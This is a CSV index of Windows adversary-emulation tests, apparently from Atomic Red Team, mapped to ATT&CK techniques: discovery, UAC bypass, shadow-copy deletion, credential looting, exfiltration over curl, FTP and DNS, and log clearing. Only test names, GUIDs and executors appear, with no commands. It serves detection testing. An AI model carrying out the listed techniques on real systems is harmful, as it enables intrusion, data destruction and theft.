discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt
discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt
discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell
discovery,T1482,Domain Trust Discovery,4,Adfind - Enumerate Active Directory OUs,d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec,command_prompt
discovery,T1482,Domain Trust Discovery,5,Adfind - Enumerate Active Directory Trusts,15fe436d-e771-4ff3-b655-2dca9ba52834,command_prompt
discovery,T1482,Domain Trust Discovery,6,Get-DomainTrust with PowerView,f974894c-5991-4b19-aaf5-7cc2fe298c5d,powershell
discovery,T1482,Domain Trust Discovery,7,Get-ForestTrust with PowerView,58ed10e8-0738-4651-8408-3a3e9a526279,powershell
discovery,T1482,Domain Trust Discovery,8,TruffleSnout - Listing AD Infrastructure,ea1b4f2d-5b82-4006-b64f-f2845608a3bf,command_prompt
discovery,T1083,File and Directory Discovery,1,File and Directory Discovery (cmd.exe),0e36303b-6762-4500-b003-127743b80ba6,command_prompt
discovery,T1083,File and Directory Discovery,2,File and Directory Discovery (PowerShell),2158908e-b7ef-4c21-8a83-3ce4dd05a924,powershell
discovery,T1083,File and Directory Discovery,5,Simulating MAZE Directory Enumeration,c6c34f61-1c3e-40fb-8a58-d017d88286d8,powershell
discovery,T1083,File and Directory Discovery,6,Launch DirLister Executable,c5bec457-43c9-4a18-9a24-fe151d8971b7,powershell
discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt
discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell
discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
discovery,T1057,Process Discovery,3,Process Discovery - Get-Process,3b3809b6-a54b-4f5b-8aff-cb51f2e97b34,powershell
discovery,T1057,Process Discovery,4,Process Discovery - get-wmiObject,b51239b4-0129-474f-a2b4-70f855b9f2c2,powershell
discovery,T1057,Process Discovery,5,Process Discovery - wmic process,640cbf6d-659b-498b-ba53-f6dd1a1cc02c,command_prompt
discovery,T1057,Process Discovery,6,Discover Specific Process - tasklist,11ba69ee-902e-4a0f-b3b6-418aed7d7ddb,command_prompt
discovery,T1069.001,Permission Groups Discovery: Local Groups,2,Basic Permission Groups Discovery Windows (Local),1f454dd6-e134-44df-bebb-67de70fb6cd8,command_prompt
discovery,T1069.001,Permission Groups Discovery: Local Groups,3,Permission Groups Discovery PowerShell (Local),a580462d-2c19-4bc7-8b9a-57a41b7d3ba4,powershell
discovery,T1069.001,Permission Groups Discovery: Local Groups,4,SharpHound3 - LocalAdmin,e03ada14-0980-4107-aff1-7783b2b59bb1,powershell
discovery,T1069.001,Permission Groups Discovery: Local Groups,5,Wmic Group Discovery,7413be50-be8e-430f-ad4d-07bf197884b2,powershell
discovery,T1069.001,Permission Groups Discovery: Local Groups,6,WMIObject Group Discovery,69119e58-96db-4110-ad27-954e48f3bb13,powershell
discovery,T1201,Password Policy Discovery,5,Examine local password policy - Windows,4588d243-f24e-4549-b2e3-e627acc089f6,command_prompt
discovery,T1201,Password Policy Discovery,6,Examine domain password policy - Windows,46c2c362-2679-4ef5-aec9-0e958e135be4,command_prompt
discovery,T1201,Password Policy Discovery,8,Get-DomainPolicy with PowerView,3177f4da-3d4b-4592-8bdc-aa23d0b2e843,powershell
discovery,T1201,Password Policy Discovery,9,Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy,b2698b33-984c-4a1c-93bb-e4ba72a0babb,powershell
discovery,T1201,Password Policy Discovery,10,Use of SecEdit.exe to export the local security policy (including the password policy),510cc97f-56ac-4cd3-a198-d3218c23d889,command_prompt
discovery,T1614.001,System Location Discovery: System Language Discovery,1,Discover System Language by Registry Query,631d4cf1-42c9-4209-8fe9-6bd4de9421be,command_prompt
discovery,T1614.001,System Location Discovery: System Language Discovery,2,Discover System Language with chcp,d91473ca-944e-477a-b484-0e80217cd789,command_prompt
discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt
discovery,T1012,Query Registry,2,Query Registry with Powershell cmdlets,0434d081-bb32-42ce-bcbb-3548e4f2628f,powershell
discovery,T1012,Query Registry,3,Enumerate COM Objects in Registry with Powershell,0d80d088-a84c-4353-af1a-fc8b439f1564,powershell
discovery,T1518.001,Software Discovery: Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
discovery,T1518.001,Software Discovery: Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
discovery,T1518.001,Software Discovery: Security Software Discovery,5,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt
discovery,T1518.001,Software Discovery: Security Software Discovery,6,Security Software Discovery - AV Discovery via WMI,1553252f-14ea-4d3b-8a08-d7a4211aa945,command_prompt
discovery,T1018,Remote System Discovery,1,Remote System Discovery - net,85321a9c-897f-4a60-9f20-29788e50bccd,command_prompt
discovery,T1018,Remote System Discovery,2,Remote System Discovery - net group Domain Computers,f1bf6c8f-9016-4edf-aff9-80b65f5d711f,command_prompt
discovery,T1018,Remote System Discovery,3,Remote System Discovery - nltest,52ab5108-3f6f-42fb-8ba3-73bc054f22c8,command_prompt
discovery,T1018,Remote System Discovery,4,Remote System Discovery - ping sweep,6db1f57f-d1d5-4223-8a66-55c9c65a9592,command_prompt
discovery,T1018,Remote System Discovery,5,Remote System Discovery - arp,2d5a61f5-0447-4be4-944a-1f8530ed6574,command_prompt
discovery,T1018,Remote System Discovery,8,Remote System Discovery - nslookup,baa01aaa-5e13-45ec-8a0d-e46c93c9760f,powershell
discovery,T1018,Remote System Discovery,9,Remote System Discovery - adidnsdump,95e19466-469e-4316-86d2-1dc401b5a959,command_prompt
discovery,T1018,Remote System Discovery,10,Adfind - Enumerate Active Directory Computer Objects,a889f5be-2d54-4050-bd05-884578748bb4,command_prompt
discovery,T1018,Remote System Discovery,11,Adfind - Enumerate Active Directory Domain Controller Objects,5838c31e-a0e2-4b9f-b60a-d79d2cb7995e,command_prompt
discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Active Directory using DirectorySearcher,962a6017-1c09-45a6-880b-adc9c57cb22e,powershell
discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with Get-AdComputer,97e89d9e-e3f5-41b5-a90f-1e0825df0fdf,powershell
discovery,T1018,Remote System Discovery,17,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
discovery,T1018,Remote System Discovery,18,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
discovery,T1018,Remote System Discovery,19,Get-WmiObject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
discovery,T1018,Remote System Discovery,20,Remote System Discovery - net group Domain Controller,5843529a-5056-4bc1-9c13-a311e2af4ca0,command_prompt
discovery,T1046,Network Service Discovery,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
discovery,T1046,Network Service Discovery,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
discovery,T1046,Network Service Discovery,5,WinPwn - spoolvulnscan,54574908-f1de-4356-9021-8053dd57439a,powershell
discovery,T1046,Network Service Discovery,6,WinPwn - MS17-10,97585b04-5be2-40e9-8c31-82157b8af2d6,powershell
discovery,T1046,Network Service Discovery,7,WinPwn - bluekeep,1cca5640-32a9-46e6-b8e0-fabbe2384a73,powershell
discovery,T1046,Network Service Discovery,8,WinPwn - fruit,bb037826-cbe8-4a41-93ea-b94059d6bb98,powershell
discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
discovery,T1518,Software Discovery,4,WinPwn - Dotnetsearch,7e79a1b6-519e-433c-ad55-3ff293667101,powershell
discovery,T1518,Software Discovery,5,WinPwn - DotNet,10ba02d0-ab76-4f80-940d-451633f24c5b,powershell
discovery,T1518,Software Discovery,6,WinPwn - powerSQL,0bb64470-582a-4155-bde2-d6003a95ed34,powershell
discovery,T1124,System Time Discovery,1,System Time Discovery,20aba24b-e61f-4b26-b4ce-4784f763ca20,command_prompt
discovery,T1124,System Time Discovery,2,System Time Discovery - PowerShell,1d5711d6-655c-4a47-ae9c-6503c74fa877,powershell
discovery,T1124,System Time Discovery,4,System Time Discovery W32tm as a Delay,d5d5a6b0-0f92-42d8-985d-47aafa2dd4db,command_prompt
discovery,T1124,System Time Discovery,5,System Time with Windows time Command,53ead5db-7098-4111-bb3f-563be390e72e,command_prompt
impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt
impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt
impact,T1489,Service Stop,3,Windows - Stop service by killing process,f3191b84-c38b-400b-867e-3a217a27795f,command_prompt
impact,T1491.001,Defacement: Internal Defacement,1,Replace Desktop Wallpaper,30558d53-9d76-41c4-9267-a7bd5184bed3,powershell
impact,T1491.001,Defacement: Internal Defacement,2,Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message,ffcbfaab-c9ff-470b-928c-f086b326089b,powershell
impact,T1531,Account Access Removal,1,Change User Password - Windows,1b99ef28-f83c-4ec5-8a08-1a56263a5bb2,command_prompt
impact,T1531,Account Access Removal,2,Delete User - Windows,f21a1d7d-a62f-442a-8c3a-2440d43b19e5,command_prompt
impact,T1531,Account Access Removal,3,Remove Account From Domain Admin Group,43f71395-6c37-498e-ab17-897d814a0947,powershell
impact,T1486,Data Encrypted for Impact,5,PureLocker Ransom Note,649349c7-9abf-493b-a7a2-b1aa4d141528,command_prompt
impact,T1486,Data Encrypted for Impact,8,Data Encrypted with GPG4Win,4541e2c2-33c8-44b1-be79-9161440f1718,powershell
impact,T1485,Data Destruction,1,Windows - Overwrite file with Sysinternals SDelete,476419b5-aebf-4366-a131-ae3e8dae5fc2,powershell
impact,T1485,Data Destruction,3,Overwrite deleted data on C drive,321fd25e-0007-417f-adec-33232252be19,command_prompt
impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt
impact,T1490,Inhibit System Recovery,2,Windows - Delete Volume Shadow Copies via WMI,6a3ff8dd-f49c-4272-a658-11c2fe58bd88,command_prompt
impact,T1490,Inhibit System Recovery,3,Windows - wbadmin Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt
impact,T1490,Inhibit System Recovery,4,Windows - Disable Windows Recovery Console Repair,cf21060a-80b3-4238-a595-22525de4ab81,command_prompt
impact,T1490,Inhibit System Recovery,5,Windows - Delete Volume Shadow Copies via WMI with PowerShell,39a295ca-7059-4a88-86f6-09556c1211e7,powershell
impact,T1490,Inhibit System Recovery,6,Windows - Delete Backup Files,6b1dbaf6-cc8a-4ea6-891f-6058569653bf,command_prompt
impact,T1490,Inhibit System Recovery,7,Windows - wbadmin Delete systemstatebackup,584331dd-75bc-4c02-9e0b-17f5fd81c748,command_prompt
impact,T1490,Inhibit System Recovery,8,Windows - Disable the SR scheduled task,1c68c68d-83a4-4981-974e-8993055fa034,command_prompt
impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,66e647d1-8741-4e43-b7c1-334760c2047f,command_prompt
impact,T1529,System Shutdown/Reboot,1,Shutdown System - Windows,ad254fa8-45c0-403b-8c77-e00b3d3e7a64,command_prompt
impact,T1529,System Shutdown/Reboot,2,Restart System - Windows,f4648f0d-bf78-483c-bafc-3ec99cd1c302,command_prompt
impact,T1529,System Shutdown/Reboot,10,Logoff System - Windows,3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4,command_prompt
initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
initial-access,T1566.001,Phishing: Spearphishing Attachment,1,Download Macro-Enabled Phishing Attachment,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
initial-access,T1566.001,Phishing: Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell
initial-access,T1091,Replication Through Removable Media,1,USB Malware Spread Simulation,d44b7297-622c-4be8-ad88-ec40d7563c75,powershell
initial-access,T1195,Supply Chain Compromise,1,Octopus Scanner Malware Open Source Supply Chain,82a9f001-94c5-495e-9ed5-f530dbded5e2,command_prompt
initial-access,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
initial-access,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
initial-access,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
initial-access,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
initial-access,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,1,Exfiltrate data HTTPS using curl windows,1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0,command_prompt
exfiltration,T1041,Exfiltration Over C2 Channel,1,C2 Data Exfiltration,d1253f6e-c29b-49dc-b466-2147a6191932,powershell
exfiltration,T1048,Exfiltration Over Alternative Protocol,3,DNSExfiltration (doh),c943d285-ada3-45ca-b3aa-7cd6500c6a48,powershell
exfiltration,T1567.002,Exfiltration Over Web Service: Exfiltration to Cloud Storage,1,Exfiltrate data with rclone to cloud Storage - Mega (Windows),8529ee44-279a-4a19-80bf-b846a40dda58,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,6,MAZE FTP Upload,57799bc2-ad1e-4130-a793-fb0c385130ba,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,7,Exfiltration Over Alternative Protocol - FTP - Rclone,b854eb97-bf9b-45ab-a1b5-b94e4880c56b,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 1 Rundll32 execute JavaScript Remote Payload With GetObject 57ba4ce9-ee7a-4f27-9928-3c70c489b59d command_prompt
3 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 2 Rundll32 execute VBscript command 638730e7-7aed-43dc-bf8c-8117f805f5bb command_prompt
4 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 3 Rundll32 execute VBscript command using Ordinal number 32d1cf1b-cbc2-4c09-8d05-07ec5c83a821 command_prompt
5 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 4 Rundll32 advpack.dll Execution d91cae26-7fc1-457b-a854-34c8aad48c89 command_prompt
6 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 5 Rundll32 ieadvpack.dll Execution 5e46a58e-cbf6-45ef-a289-ed7754603df9 command_prompt
7 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 6 Rundll32 syssetup.dll Execution 41fa324a-3946-401e-bbdd-d7991c628125 command_prompt
8 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 7 Rundll32 setupapi.dll Execution 71d771cd-d6b3-4f34-bc76-a63d47a10b19 command_prompt
9 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 8 Execution of HTA and VBS Files using Rundll32 and URL.dll 22cfde89-befe-4e15-9753-47306b37a6e3 command_prompt
10 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 9 Launches an executable using Rundll32 and pcwutl.dll 9f5d081a-ee5a-42f9-a04e-b7bdc487e676 command_prompt
11 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 10 Execution of non-dll using rundll32.exe ae3a8605-b26e-457c-b6b3-2702fd335bac powershell
12 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 11 Rundll32 with Ordinal Value 9fd5a74b-ba89-482a-8a3e-a5feaa3697b0 command_prompt
13 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 12 Rundll32 with Control_RunDLL e4c04b6f-c492-4782-82c7-3bf75eb8077e command_prompt
14 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 13 Rundll32 with desk.cpl 83a95136-a496-423c-81d3-1c6750133917 command_prompt
15 defense-evasion T1216.001 Signed Script Proxy Execution: Pubprn 1 PubPrn.vbs Signed Script Bypass 9dd29a1f-1e16-4862-be83-913b10a88f6c command_prompt
16 defense-evasion T1006 Direct Volume Access 1 Read volume boot sector via DOS device path (PowerShell) 88f6327e-51ec-4bbf-b2e8-3fea534eab8b powershell
17 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 1 Bypass UAC using Event Viewer (cmd) 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 command_prompt
18 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 2 Bypass UAC using Event Viewer (PowerShell) a6ce9acf-842a-4af6-8f79-539be7608e2b powershell
19 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 3 Bypass UAC using Fodhelper 58f641ea-12e3-499a-b684-44dee46bd182 command_prompt
20 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 4 Bypass UAC using Fodhelper - PowerShell 3f627297-6c38-4e7d-a278-fc2563eaaeaa powershell
21 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 5 Bypass UAC using ComputerDefaults (PowerShell) 3c51abf2-44bf-42d8-9111-dc96ff66750f powershell
22 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 6 Bypass UAC by Mocking Trusted Directories f7a35090-6f7f-4f64-bb47-d657bf5b10c1 command_prompt
23 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 7 Bypass UAC using sdclt DelegateExecute 3be891eb-4608-4173-87e8-78b494c029b7 powershell
24 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 8 Disable UAC using reg.exe 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 command_prompt
25 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 9 Bypass UAC using SilentCleanup task 28104f8a-4ff1-4582-bcf6-699dce156608 command_prompt
26 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 10 UACME Bypass Method 23 8ceab7a2-563a-47d2-b5ba-0995211128d7 command_prompt
27 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 11 UACME Bypass Method 31 b0f76240-9f33-4d34-90e8-3a7d501beb15 command_prompt
28 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 12 UACME Bypass Method 33 e514bb03-f71c-4b22-9092-9f961ec6fb03 command_prompt
29 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 13 UACME Bypass Method 34 695b2dac-423e-448e-b6ef-5b88e93011d6 command_prompt
30 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 14 UACME Bypass Method 39 56163687-081f-47da-bb9c-7b231c5585cf command_prompt
31 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 15 UACME Bypass Method 56 235ec031-cd2d-465d-a7ae-68bab281e80e command_prompt
32 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 16 UACME Bypass Method 59 dfb1b667-4bb8-4a63-a85e-29936ea75f29 command_prompt
33 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 17 UACME Bypass Method 61 7825b576-744c-4555-856d-caf3460dc236 command_prompt
34 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 18 WinPwn - UAC Magic 964d8bf8-37bc-4fd3-ba36-ad13761ebbcc powershell
35 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 19 WinPwn - UAC Bypass ccmstp technique f3c145f9-3c8d-422c-bd99-296a17a8f567 powershell
36 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 20 WinPwn - UAC Bypass DiskCleanup technique 1ed67900-66cd-4b09-b546-2a0ef4431a0c powershell
37 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 21 WinPwn - UAC Bypass DccwBypassUAC technique 2b61977b-ae2d-4ae4-89cb-5c36c89586be powershell
38 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key 251c5936-569f-42f4-9ac2-87a173b9e9b8 powershell
39 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 23 UAC Bypass with WSReset Registry Modification 3b96673f-9c92-40f1-8a3e-ca060846f8d9 powershell
40 defense-evasion T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 1 Service Registry Permissions Weakness f7536d63-7fd4-466f-89da-7e48d550752a powershell
41 defense-evasion T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 2 Service ImagePath Change with reg.exe f38e9eea-e1d7-4ba6-b716-584791963827 command_prompt
42 defense-evasion T1036.005 Masquerading: Match Legitimate Name or Location 2 Masquerade as a built-in system executable 35eb8d16-9820-4423-a2a1-90c4f5edd9ca powershell
43 defense-evasion T1564 Hide Artifacts 1 Extract binary files via VBA 6afe288a-8a8b-4d33-a629-8d03ba9dad3a powershell
44 defense-evasion T1564 Hide Artifacts 2 Create a Hidden User Called "$" 2ec63cc2-4975-41a6-bf09-dffdfb610778 command_prompt
45 defense-evasion T1564 Hide Artifacts 3 Create an "Administrator " user (with a space on the end) 5bb20389-39a5-4e99-9264-aeb92a55a85c powershell
46 defense-evasion T1564 Hide Artifacts 4 Create and Hide a Service with sc.exe 333c7de0-6fbe-42aa-ac2b-c7e40b18246a command_prompt
47 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 2 Detect Virtualization Environment (Windows) 502a7dc4-9d6f-4d28-abf2-f0e84692562d powershell
48 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 4 Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) 4a41089a-48e0-47aa-82cb-5b81a463bc78 powershell
49 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 1 CheckIfInstallable method call ffd9c807-d402-47d2-879d-f915cf2a3a94 powershell
50 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 2 InstallHelper method call d43a5bde-ae28-4c55-a850-3f4c80573503 powershell
51 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 3 InstallUtil class constructor method call 9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93 powershell
52 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 4 InstallUtil Install method call 9f9968a6-601a-46ca-b7b7-6d4fe0f98f0b powershell
53 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 5 InstallUtil Uninstall method call - /U variant 34428cfa-8e38-41e5-aff4-9e1f8f3a7b4b powershell
54 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 6 InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant 06d9deba-f732-48a8-af8e-bdd6e4d98c1d powershell
55 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 7 InstallUtil HelpText method call 5a683850-1145-4326-a0e5-e91ced3c6022 powershell
56 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 8 InstallUtil evasive invocation 559e6d06-bb42-4307-bff7-3b95a8254bad powershell
57 defense-evasion T1574.001 Hijack Execution Flow: DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
58 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 Take ownership using takeown utility 98d34bb4-6e75-42ad-9c41-1dae7dc6a001 command_prompt
59 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 2 cacls - Grant permission to specified user or group recursively a8206bcc-f282-40a9-a389-05d9c0263485 command_prompt
60 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 3 attrib - Remove read-only attribute bec1e95c-83aa-492e-ab77-60c71bbd21b0 command_prompt
61 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 4 attrib - hide file 32b979da-7b68-42c9-9a99-0e39900fc36c command_prompt
62 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 5 Grant Full Access to folder for Everyone - Ryuk Ransomware Style ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 command_prompt
63 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 1 Msiexec.exe - Execute Local MSI file with embedded JScript a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04 command_prompt
64 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 2 Msiexec.exe - Execute Local MSI file with embedded VBScript 8d73c7b0-c2b1-4ac1-881a-4aa644f76064 command_prompt
65 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 3 Msiexec.exe - Execute Local MSI file with an embedded DLL 628fa796-76c5-44c3-93aa-b9d8214fd568 command_prompt
66 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 4 Msiexec.exe - Execute Local MSI file with an embedded EXE ed3fa08a-ca18-4009-973e-03d13014d0e8 command_prompt
67 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 5 WMI Win32_Product Class - Execute Local MSI file with embedded JScript 882082f0-27c6-4eec-a43c-9aa80bccdb30 powershell
68 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 6 WMI Win32_Product Class - Execute Local MSI file with embedded VBScript cf470d9a-58e7-43e5-b0d2-805dffc05576 powershell
69 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 7 WMI Win32_Product Class - Execute Local MSI file with an embedded DLL 32eb3861-30da-4993-897a-42737152f5f8 powershell
70 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 8 WMI Win32_Product Class - Execute Local MSI file with an embedded EXE 55080eb0-49ae-4f55-a440-4167b7974f79 powershell
71 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 9 Msiexec.exe - Execute the DllRegisterServer function of a DLL 0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d command_prompt
72 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 10 Msiexec.exe - Execute the DllUnregisterServer function of a DLL ab09ec85-4955-4f9c-b8e0-6851baf4d47f command_prompt
73 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 11 Msiexec.exe - Execute Remote MSI file 44a4bedf-ffe3-452e-bee4-6925ab125662 command_prompt
74 defense-evasion T1556.002 Modify Authentication Process: Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
75 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 10 Prevent Powershell History Logging 2f898b81-3e97-4abb-bc3f-a95138988370 powershell
76 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 11 Clear Powershell History by Deleting History File da75ae8d-26d6-4483-b0fe-700e4df4f037 powershell
77 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 12 Set Custom AddToHistoryHandler to Avoid History File Logging 1d0d9aa6-6111-4f89-927b-53e8afae7f94 powershell
78 defense-evasion T1202 Indirect Command Execution 1 Indirect Command Execution - pcalua.exe cecfea7a-5f03-4cdd-8bc8-6f7c22862440 command_prompt
79 defense-evasion T1202 Indirect Command Execution 2 Indirect Command Execution - forfiles.exe 8b34a448-40d9-4fc3-a8c8-4bb286faf7dc command_prompt
